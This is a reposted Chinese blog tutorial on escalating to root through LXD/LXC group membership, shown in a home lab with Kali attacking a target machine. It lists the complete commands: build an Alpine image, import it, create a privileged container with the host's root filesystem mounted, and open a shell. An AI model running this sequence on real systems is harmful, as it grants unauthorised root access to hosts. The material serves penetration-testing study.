lxd/lxc提权

漏洞介绍

lxd一个root进程,它可以负责执行任意用户lxdunix套接字写入访问操作。而且在一些情况下,lxd不会调用它的用户权限进行检查匹配

原理可以理解为用用户创建一个容器,再用容器挂载宿主机磁盘最后使用容器权限操作宿主机磁盘内容达到提权效果

提权复现

环境攻击kali 192.168.31.131 靶机 192.168.31.134

image-20231125152324099

image-20231125152414099

攻击kali操作

通过git构建好的alpine镜像克隆到本地,并构建

git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686

然后自己操作系统对应架构tar文件发送到靶机上

python -m http.server 8848

然后下载目录上使用此命令导入镜像

lxc image import ./alpine*.tar.gz --alias myimage 

初始化镜像,一路回车选择默认,不过会有几个显示以及存在default,让你重命名的,选择了就可以

lxd init

可能最后报错,但是也没关系

例如

image-20231125171111579

运行镜像

lxc init myimage mycontainer -c security.privileged=true

将/root挂载镜像

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

与镜像交互

lxc start mycontainer
lxc exec mycontainer /bin/sh
lxc start mycontainer
lxc exec mycontainer /bin/sh

image-20231125171236266

原文地址:https://blog.csdn.net/longwanlian/article/details/134617310

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_15195.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注